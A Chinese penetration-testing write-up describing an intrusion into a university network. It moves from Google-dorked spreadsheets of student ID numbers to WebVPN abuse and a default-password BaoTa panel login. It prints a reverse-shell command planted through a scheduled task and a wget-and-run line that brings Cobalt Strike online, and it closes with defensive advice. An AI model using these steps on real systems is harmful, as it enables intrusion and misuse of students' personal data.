记一次edu漏洞挖掘——从信息泄露到内网滲透
字数 1489 2025-08-29 08:31:42

从信息泄露到内网渗透:教育系统漏洞挖掘实战教学

0x00 前言

本教学文档详细记录了一次针对教育系统(edu.cn)的渗透测试过程,从信息收集开始,通过敏感信息泄露发现突破口,最终实现内网渗透的全过程。该漏洞已通过合法渠道提交并修复。

0x01 信息收集阶段

1. 信息收集方法论

本次渗透测试使用了以下信息收集技术组合:

  • Google Hacking技术
  • Github信息收集(未获有效信息)
  • 前端信息泄露分析
  • ARL灯塔资产收集系统(用于子域名、IP、端口服务、文件泄露等)

2. Google Hacking实战

使用特殊搜索语法发现敏感信息:

filetype:xls site:xxx.edu.cn 身份

此搜索语法可发现包含"身份"关键词的Excel文件,其中可能包含敏感信息。

验证过程

  1. 发现标题为"名单"的Excel文件
  2. 下载并审查文件内容
  3. 确认文件中包含身份证号和学号等敏感信息

3. WebVPN入口发现

通过ARL资产扫描发现关键入口点:

  • 发现WebVPN系统(常见内网入口)
  • 使用之前获取的身份证号和学号尝试登录
  • 成功登录后观察系统功能

4. WebVPN结构分析

发现WebVPN URL具有特定规律:

http://[访问地址].xxx.xxx.edu.cn:8118

其中[访问地址]部分可替换为任意域名,系统会自动拼接访问。

验证方法
将访问地址改为2021-ip138-com进行测试,确认该结构有效。

5. 前端信息泄露

在抓包分析官网(www.xxx.edu.cn)时发现:

  • 响应中包含内网IP地址(10.30.252.33)
  • 尝试直接访问失败
  • 推测该IP属于校园网站服务器网段

内网探测方法

  1. 修改C段地址进行探测(如10.30.252.23)
  2. 确认部分内网地址可访问
  3. 但无法直接指定端口和HTTPS访问

6. 端口指定技巧

通过Google搜索发现特殊URL结构:

http://xxx-xxx-edu-cn-8090-p-s.xxx.xxx.edu.cn:8118/surveydetail.aspx?pid=5&cid=397

解析出以下规则:

  • -8080-p:指定端口
  • -s:指定HTTPS访问

0x02 内网渗透阶段

1. 内网服务发现

利用发现的URL规则对内网进行探测,发现:

  • 宝塔面板管理界面
  • 尝试常见弱口令组合

2. 宝塔面板入侵

使用弱口令成功登录:

用户名:admin
密码:admin

3. 后门植入技术

通过宝塔面板的"任务计划"功能植入反弹shell:

bash -i >& /dev/tcp/IP/PORT 0>&1

4. 持久化控制

使用CobaltStrike(配合Cross2插件)建立持久控制:

wget http://IP:PORT/SHELLCODE && chmod +x SHELLCODE && ./SHELLCODE

成功上线服务器。

0x03 关键知识点总结

  1. 信息收集是渗透的核心

    • 分散的信息可能在关键时刻形成突破口
    • 需要系统性地收集和关联各种信息

  2. Google Hacking技巧

    • 使用特定语法(filetype, site等)可发现敏感文件
    • 需要耐心审查下载的文件内容

  3. WebVPN结构分析

    • 理解URL拼接规则可扩大攻击面
    • 通过修改关键参数可访问更多资源

  4. 内网探测方法

    • 从已知信息推断内网结构
    • 系统性地进行C段扫描
    • 掌握端口指定技巧

  5. 弱口令利用

    • 管理界面常使用默认或弱口令
    • 需要尝试常见组合

  6. 后门技术

    • 利用系统功能(如任务计划)植入后门
    • 使用成熟的C2框架建立持久控制

0x04 防御建议

  1. 敏感信息保护

    • 避免将含敏感信息的文件暴露在公网
    • 定期审查公开资源

  2. WebVPN安全

    • 实施强身份验证
    • 限制可访问的内网资源
    • 监控异常访问模式

  3. 密码策略

    • 禁用默认凭证
    • 实施强密码策略
    • 启用多因素认证

  4. 系统加固

    • 限制管理界面访问
    • 定期更新和打补丁
    • 监控可疑进程和网络连接

  5. 安全意识培训

    • 提高开发和管理人员安全意识
    • 建立安全开发流程

本教学文档完整呈现了一次教育系统渗透测试的技术路径,强调了信息收集在渗透测试中的核心地位,以及如何将零散信息关联形成完整攻击链的过程。

从信息泄露到内网渗透:教育系统漏洞挖掘实战教学 0x00 前言 本教学文档详细记录了一次针对教育系统(edu.cn)的渗透测试过程,从信息收集开始,通过敏感信息泄露发现突破口,最终实现内网渗透的全过程。该漏洞已通过合法渠道提交并修复。 0x01 信息收集阶段 1. 信息收集方法论 本次渗透测试使用了以下信息收集技术组合: Google Hacking技术 Github信息收集(未获有效信息) 前端信息泄露分析 ARL灯塔资产收集系统(用于子域名、IP、端口服务、文件泄露等) 2. Google Hacking实战 使用特殊搜索语法发现敏感信息: 此搜索语法可发现包含"身份"关键词的Excel文件,其中可能包含敏感信息。 验证过程 : 发现标题为"名单"的Excel文件 下载并审查文件内容 确认文件中包含身份证号和学号等敏感信息 3. WebVPN入口发现 通过ARL资产扫描发现关键入口点: 发现WebVPN系统(常见内网入口) 使用之前获取的身份证号和学号尝试登录 成功登录后观察系统功能 4. WebVPN结构分析 发现WebVPN URL具有特定规律: 其中 [访问地址] 部分可替换为任意域名,系统会自动拼接访问。 验证方法 : 将访问地址改为 2021-ip138-com 进行测试,确认该结构有效。 5. 前端信息泄露 在抓包分析官网(www.xxx.edu.cn)时发现: 响应中包含内网IP地址(10.30.252.33) 尝试直接访问失败 推测该IP属于校园网站服务器网段 内网探测方法 : 修改C段地址进行探测(如10.30.252.23) 确认部分内网地址可访问 但无法直接指定端口和HTTPS访问 6. 端口指定技巧 通过Google搜索发现特殊URL结构: 解析出以下规则: -8080-p :指定端口 -s :指定HTTPS访问 0x02 内网渗透阶段 1. 内网服务发现 利用发现的URL规则对内网进行探测,发现: 宝塔面板管理界面 尝试常见弱口令组合 2. 宝塔面板入侵 使用弱口令成功登录: 3. 后门植入技术 通过宝塔面板的"任务计划"功能植入反弹shell: 4. 持久化控制 使用CobaltStrike(配合Cross2插件)建立持久控制: 成功上线服务器。 0x03 关键知识点总结 信息收集是渗透的核心 : 分散的信息可能在关键时刻形成突破口 需要系统性地收集和关联各种信息 Google Hacking技巧 : 使用特定语法(filetype, site等)可发现敏感文件 需要耐心审查下载的文件内容 WebVPN结构分析 : 理解URL拼接规则可扩大攻击面 通过修改关键参数可访问更多资源 内网探测方法 : 从已知信息推断内网结构 系统性地进行C段扫描 掌握端口指定技巧 弱口令利用 : 管理界面常使用默认或弱口令 需要尝试常见组合 后门技术 : 利用系统功能(如任务计划)植入后门 使用成熟的C2框架建立持久控制 0x04 防御建议 敏感信息保护 : 避免将含敏感信息的文件暴露在公网 定期审查公开资源 WebVPN安全 : 实施强身份验证 限制可访问的内网资源 监控异常访问模式 密码策略 : 禁用默认凭证 实施强密码策略 启用多因素认证 系统加固 : 限制管理界面访问 定期更新和打补丁 监控可疑进程和网络连接 安全意识培训 : 提高开发和管理人员安全意识 建立安全开发流程 本教学文档完整呈现了一次教育系统渗透测试的技术路径,强调了信息收集在渗透测试中的核心地位,以及如何将零散信息关联形成完整攻击链的过程。